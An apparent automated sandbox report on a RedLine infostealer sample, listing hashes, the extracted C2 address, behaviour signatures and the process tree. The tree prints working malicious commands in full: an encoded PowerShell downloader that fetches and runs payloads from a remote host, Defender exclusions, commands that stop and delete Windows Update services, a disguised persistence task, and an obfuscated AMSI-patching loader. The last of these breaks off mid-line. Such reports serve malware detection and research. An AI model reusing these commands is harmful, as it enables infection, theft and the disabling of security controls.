redline | dcdf6845df1e1aed6f335dd6f2a3ff7351984522235937e5c4a1c746c7fe4371

Analysis

max time kernel
29s
max time network
75s
platform
windows10-2004_x64
resource
win10v2004-20221111-en
resource tags

arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
submitted
16-11-2022 14:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

C4Loader.exe
Size

451KB
MD5

6ebfb1bc4aef4886d38fbb5170371b58
SHA1

084b3f0910c3fcf8a4cfeed2428ff786b94f3759
SHA256

dcdf6845df1e1aed6f335dd6f2a3ff7351984522235937e5c4a1c746c7fe4371
SHA512

c041161a616de51ebe98e01c93e710ccf177a52f998376808b56e6e624c40729377298335fde0092b2472af3acd8e9b417701f23c4afc24053e837f17346300a
SSDEEP

6144:aO6T/AiMhIbmjE1RrkHDS83avj7hPBV8MvqndNrhuCJm/rGlnrxZOc:cT/yIKjE1RrkHDS83aHTehuCJwGlnXJ

Score

10^/10

redline 1 evasion infostealer

Malware Config

Extracted

Family

redline

Botnet

107.182.129.73:21733

Attributes

auth_value
3a5bb0917495b4312d052a0b8977d2bb

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4088-174-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline

Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs

Processes:

SmartDefRun.exe

description	pid	process	target process
PID 4180 created 752	4180	SmartDefRun.exe	Explorer.EXE
PID 4180 created 752	4180	SmartDefRun.exe	Explorer.EXE
PID 4180 created 752	4180	SmartDefRun.exe	Explorer.EXE

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

8 4064 powershell.exe
Downloads MZ/PE file
Drops file in Drivers directory 1 IoCs

Processes:

SmartDefRun.exe

description ioc process

File created C:\Windows\System32\drivers\etc\hosts SmartDefRun.exe
Executes dropped EXE 4 IoCs

Processes:

C4Loader.exenew2.exeSysApp.exeSmartDefRun.exe

pid process

2056 C4Loader.exe
4460 new2.exe
208 SysApp.exe
4180 SmartDefRun.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Suspicious use of SetThreadContext 2 IoCs

Processes:

C4Loader.exenew2.exe

description pid process target process

PID 4716 set thread context of 4868 4716 C4Loader.exe vbc.exe
PID 4460 set thread context of 4088 4460 new2.exe vbc.exe
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

2932 sc.exe
1236 sc.exe
2792 sc.exe
4540 sc.exe
2628 sc.exe
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

444 4716 WerFault.exe C4Loader.exe

flow	pid	process
8	4064	powershell.exe

description	ioc	process
File created	C:\Windows\System32\drivers\etc\hosts	SmartDefRun.exe

pid	process
2056	C4Loader.exe
4460	new2.exe
208	SysApp.exe
4180	SmartDefRun.exe

description	pid	process	target process
PID 4716 set thread context of 4868	4716	C4Loader.exe	vbc.exe
PID 4460 set thread context of 4088	4460	new2.exe	vbc.exe

pid	process
2932	sc.exe
1236	sc.exe
2792	sc.exe
4540	sc.exe
2628	sc.exe

pid	pid_target	process	target process
444	4716	WerFault.exe	C4Loader.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

Processes:

powershell.exeSmartDefRun.exepowershell.exepowershell.exe

pid	process
4064	powershell.exe
4064	powershell.exe
4180	SmartDefRun.exe
4180	SmartDefRun.exe
3676	powershell.exe
3676	powershell.exe
4180	SmartDefRun.exe
4180	SmartDefRun.exe
4180	SmartDefRun.exe
4180	SmartDefRun.exe
1936	powershell.exe
1936	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 4064 powershell.exe
Token: SeDebugPrivilege 3676 powershell.exe
Token: SeDebugPrivilege 1936 powershell.exe

description	pid	process
Token: SeDebugPrivilege	4064	powershell.exe
Token: SeDebugPrivilege	3676	powershell.exe
Token: SeDebugPrivilege	1936	powershell.exe

Suspicious use of WriteProcessMemory 34 IoCs

Processes:

C4Loader.exevbc.exepowershell.exenew2.execmd.exe

description	pid	process	target process
PID 4716 wrote to memory of 4868	4716	C4Loader.exe	vbc.exe
PID 4716 wrote to memory of 4868	4716	C4Loader.exe	vbc.exe
PID 4716 wrote to memory of 4868	4716	C4Loader.exe	vbc.exe
PID 4716 wrote to memory of 4868	4716	C4Loader.exe	vbc.exe
PID 4716 wrote to memory of 4868	4716	C4Loader.exe	vbc.exe
PID 4868 wrote to memory of 4064	4868	vbc.exe	powershell.exe
PID 4868 wrote to memory of 4064	4868	vbc.exe	powershell.exe
PID 4868 wrote to memory of 4064	4868	vbc.exe	powershell.exe
PID 4064 wrote to memory of 2056	4064	powershell.exe	C4Loader.exe
PID 4064 wrote to memory of 2056	4064	powershell.exe	C4Loader.exe
PID 4064 wrote to memory of 2056	4064	powershell.exe	C4Loader.exe
PID 4064 wrote to memory of 4460	4064	powershell.exe	new2.exe
PID 4064 wrote to memory of 4460	4064	powershell.exe	new2.exe
PID 4064 wrote to memory of 4460	4064	powershell.exe	new2.exe
PID 4064 wrote to memory of 208	4064	powershell.exe	SysApp.exe
PID 4064 wrote to memory of 208	4064	powershell.exe	SysApp.exe
PID 4064 wrote to memory of 208	4064	powershell.exe	SysApp.exe
PID 4064 wrote to memory of 4180	4064	powershell.exe	SmartDefRun.exe
PID 4064 wrote to memory of 4180	4064	powershell.exe	SmartDefRun.exe
PID 4460 wrote to memory of 4088	4460	new2.exe	vbc.exe
PID 4460 wrote to memory of 4088	4460	new2.exe	vbc.exe
PID 4460 wrote to memory of 4088	4460	new2.exe	vbc.exe
PID 4460 wrote to memory of 4088	4460	new2.exe	vbc.exe
PID 4460 wrote to memory of 4088	4460	new2.exe	vbc.exe
PID 2124 wrote to memory of 2932	2124	cmd.exe	sc.exe
PID 2124 wrote to memory of 2932	2124	cmd.exe	sc.exe
PID 2124 wrote to memory of 1236	2124	cmd.exe	sc.exe
PID 2124 wrote to memory of 1236	2124	cmd.exe	sc.exe
PID 2124 wrote to memory of 2792	2124	cmd.exe	sc.exe
PID 2124 wrote to memory of 2792	2124	cmd.exe	sc.exe
PID 2124 wrote to memory of 4540	2124	cmd.exe	sc.exe
PID 2124 wrote to memory of 4540	2124	cmd.exe	sc.exe
PID 2124 wrote to memory of 2628	2124	cmd.exe	sc.exe
PID 2124 wrote to memory of 2628	2124	cmd.exe	sc.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:752

C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
2⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4716

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:4868

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcgBwACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAagBnAHQAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaQBiAG4AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbQBlAHAAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBkAGQAbgBzAC4AbgBlAHQALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBDADQATABvAGEAZABlAHIALgBlAHgAZQAnACwAIAA8ACMAZQB0AHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBlAHkAagAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBtAGcAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBDADQATABvAGEAZABlAHIALgBlAHgAZQAnACkAKQA8ACMAZQB0AHMAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBvAG4AbgBlAGMAdAAyAG0AZQAuAGQAZABuAHMALgBuAGUAdAAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAG4AZQB3ADIALgBlAHgAZQAnACwAIAA8ACMAcgBiAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBoAHAAZQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBsAGUAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBuAGUAdwAyAC4AZQB4AGUAJwApACkAPAAjAGYAaAB1ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBkAGQAbgBzAC4AbgBlAHQALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBsAHAAcQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHkAcwBjACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAbQB0ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAG4AdABrACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBkAGQAbgBzAC4AbgBlAHQALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAG0AYQByAHQARABlAGYAUgB1AG4ALgBlAHgAZQAnACwAIAA8ACMAegB6AGwAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB5AGgAbAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBtAHgAcgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAG0AYQByAHQARABlAGYAUgB1AG4ALgBlAHgAZQAnACkAKQA8ACMAcQB4AHoAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAagB0AG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAYwBsACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQA8ACMAaABxAGgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYwBnAGEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGIAawB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAG4AZQB3ADIALgBlAHgAZQAnACkAPAAjAGsAcgBwACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHYAbQByACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBhAHgAagAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAHkAcwBBAHAAcAAuAGUAeABlACcAKQA8ACMAZgBiAGIAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdABmAG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAaQB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQA8ACMAYgBwAHMAIwA+AA=="
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4064

C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
5⤵
- Executes dropped EXE
PID:2056

C:\Users\Admin\AppData\Local\Temp\new2.exe
"C:\Users\Admin\AppData\Local\Temp\new2.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4460

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
6⤵
PID:4088

C:\Users\Admin\AppData\Local\Temp\SysApp.exe
"C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
5⤵
- Executes dropped EXE
PID:208

C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
"C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"
5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4180

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4716 -s 256
3⤵
- Program crash
PID:444

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3676

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
- Suspicious use of WriteProcessMemory
PID:2124

C:\Windows\System32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:2932

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:1236

C:\Windows\System32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:2792

C:\Windows\System32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:4540

C:\Windows\System32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:2628

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:4052

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:3452

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
PID:2836

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:4176

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:424

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nefucvtr#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1936

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
2⤵
PID:2980

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#waqsnj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "WindowsDefenderSmartScreenQC" } Else { "C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe" }
2⤵
PID:4552

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn WindowsDefenderSmartScreenQC
3⤵
PID:4420

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
PID:4516

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4716 -ip 4716
1⤵
PID:4664

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:RQTMcPzzaaYH{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$tewtaxSxIumjSl,[Parameter(Position=1)][Type]$MUncSZRPgp)$zBRLEhZFnng=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+'f'+'l'+[Char](101)+''+'c'+''+[Char](116)+'ed'+[Char](68)+'e'+[Char](108)+''+'e'+'g'+[Char](97)+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+'M'+'e'+''+'m'+''+'o'+''+[Char](114)+'yM'+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType('M'+[Char](121)+''+[Char](68)+''+[Char](101)+'le'+[Char](103)+''+[Char](97)+'t'+'e'+''+[Char](84)+''+'y'+''+[Char](112)+''+[Char](101)+'','C'+[Char](108)+''+[Char](97)+''+'s'+'s'+[Char](44)+''+[Char](80)+'u'+'b'+'lic'+','+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+'d'+','+'A'+''+'n'+'s'+'i'+'C'+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+[Char](44)+''+[Char](65)+'u'+[Char](116)+'oC'+[Char](108)+''+'a'+'ss',[MulticastDelegate]);$zBRLEhZFnng.DefineConstructor(''+[Char](82)+'T'+'S'+''+'p'+'e'+[Char](99)+'ia'+[Char](108)+''+'N'+'a'+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+''+[Char](44)+'Pu'+[Char](98)+''+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$tewtaxSxIumjSl).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+'d'+'');$zBRLEhZFnng.DefineMethod(''+'I'+''+'n'+'v'+[Char](111)+''+[Char](107)+''+[Char](101)+'','P'+[Char](117)+''+'b'+''+'l'+''+'i'+'c'+[Char](44)+''+'H'+''+[Char](105)+''+[Char](100)+''+'e'+''+'B'+''+[Char](121)+''+'S'+''+[Char](105)+''+'g'+''+[Char](44)+'N'+[Char](101)+''+'w'+''+'S'+''+'l'+''+[Char](111)+''+'t'+''+[Char](44)+''+[Char](86)+''+'i'+'r'+[Char](116)+'ua'+[Char](108)+'',$MUncSZRPgp,$tewtaxSxIumjSl).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+'t'+'i'+''+'m'+''+'e'+''+','+'M'+[Char](97)+''+[Char](110)+''+'a'+''+'g'+''+'e'+''+[Char](100)+'');Write-Output $zBRLEhZFnng.CreateType();}$EGhTHJXEsZqjq=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+'y'+''+[Char](115)+''+[Char](116)+'em'+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+'c'+'r'+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+'t'+'.'+'Wi'+[Char](110)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+'s'+'a'+'f'+''+[Char](101)+''+'E'+''+[Char](71)+''+'h'+''+[Char](84)+''+[Char](72)+'JX'+'E'+''+[Char](115)+''+'Z'+''+'q'+''+[Char](106)+''+'q'+'');$XEGaSxhVGuBydC=$EGhTHJXEsZqjq.GetMethod(''+[Char](88)+'EGaSxhVG'+[Char](117)+''+[Char](66)+''+[Char](121)+''+[Char](100)+''+'C'+'',[Reflection.BindingFlags]''+[Char](80)+''+[Char](117)+'bl'+'i'+''+'c'+','+[Char](83)+'t'+[Char](97)+''+'t'+''+[Char](105)+'c',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$KPJiwyQWnqBLWeUSssb=RQTMcPzzaaYH @([String])([IntPtr]);$WibddwdLPsrkXnjIveAvmI=RQTMcPzzaaYH @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$lXeTPOyWctR=$EGhTHJXEsZqjq.GetMethod(''+'G'+'e'+[Char](116)+''+'M'+''+[Char](111)+''+[Char](100)+''+'u'+''+'l'+''+'e'+''+[Char](72)+''+'a'+''+[Char](110)+''+'d'+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+''+[Char](114)+''+[Char](110)+''+[Char](101)+''+'l'+'3'+'2'+'.'+[Char](100)+''+[Char](108)+''+'l'+'')));$GThwGVJpudkiSD=$XEGaSxhVGuBydC.Invoke($Null,@([Object]$lXeTPOyWctR,[Object](''+[Char](76)+''+'o'+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+'i'+''+[Char](98)+'rary'+[Char](65)+'')));$UGkVTPWsvpstmQpOE=$XEGaSxhVGuBydC.Invoke($Null,@([Object]$lXeTPOyWctR,[Object](''+'V'+'i'+[Char](114)+''+[Char](116)+''+[Char](117)+''+'a'+''+[Char](108)+''+'P'+''+[Char](114)+'otec'+[Char](116)+'')));$jWENQSW=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GThwGVJpudkiSD,$KPJiwyQWnqBLWeUSssb).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+[Char](105)+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'');$wZmueqUAIoRQiNTeZ=$XEGaSxhVGuBydC.Invoke($Null,@([Object]$jWENQSW,[Object]('A'+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+'c'+[Char](97)+''+[Char](110)+'Buff'+[Char](101)+''+[Char](114)+'')));$SYfznRNAva=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UGkVTPWsvpstmQpOE,$WibddwdLPsrkXnjIveAvmI).Invoke($wZmueqUAIoRQiNTeZ,[uint32]8,4,[ref]$SYfznRNAva);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$wZmueqUAIoRQiNTeZ,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UGkVTPWsvpstmQpOE,$WibddwdLPsrkXnjIveAvmI).Invoke($wZmueqUAIoRQiNTeZ,[uint32]8,0x20,[ref]$SYfznRNAva);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+'E'+'').GetValue(''+[Char](100)+''+[Char](105)+''+[Char](97)+'l'+[Char](101)+''+[Char](114)+''+'s'+'t'+[Char](97)+'ger')).EntryPoint.Invoke($Null,$Null)
1⤵
PID:3208

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:udewzQaqZlaP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$TGRzARSyfQwJnd,[Parameter(Position=1)][Type]$eqjaweYAXc)$QuVpqZBWwpK=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('Re'+'f'+''+[Char](108)+''+'e'+''+'c'+''+[Char](116)+'ed'+[Char](68)+''+[Char](101)+''+'l'+'e'+'g'+''+[Char](97)+'t'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+'e'+'m'+'or'+[Char](121)+''+[Char](77)+''+[Char](111)+'d'+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+'g'+'a'+'t'+''+'e'+''+[Char](84)+''+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s,'+[Char](80)+'ub'+'l'+'i'+'c'+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+'e'+''+'d'+''+[Char](44)+'An'+[Char](115)+''+[Char](105)+'C'+[Char](108)+''+[Char](97)+'s'+[Char](115)+''+','+''+'A'+'u'+'t'+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+'a'+''+'s'+'s',[MulticastDelegate]);$QuVpqZBWwpK.DefineConstructor('R'+[Char](84)+''+[Char](83)+''+'p'+'e'+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+','+'Hi'+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$TGRzARSyfQwJnd).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+'t'+'i'+[Char](109)+''+[Char](101)+',M'+[Char](97)+''+[Char](110)+'a'+[Char](103)+''+[Char](101)+''+[Char](100)+'');$QuVpqZBWwpK.DefineMethod(''+'I'+''+[Char](110)+''+'v'+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+'u'+[Char](98)+''+'l'+''+'i'+''+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+''+'d'+''+[Char](101)+''+[Char](66)+''+[Char](121)+'Sig'+[Char](44)+'Ne'+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+','+'V'+[Char](105)+''+[Char](114)+''+[Char](116)+''+'u'+'a'+[Char](108)+'',$eqjaweYAXc,$TGRzARSyfQwJnd).SetImplementationFlags(''+[Char](82)+''+'u'+''+'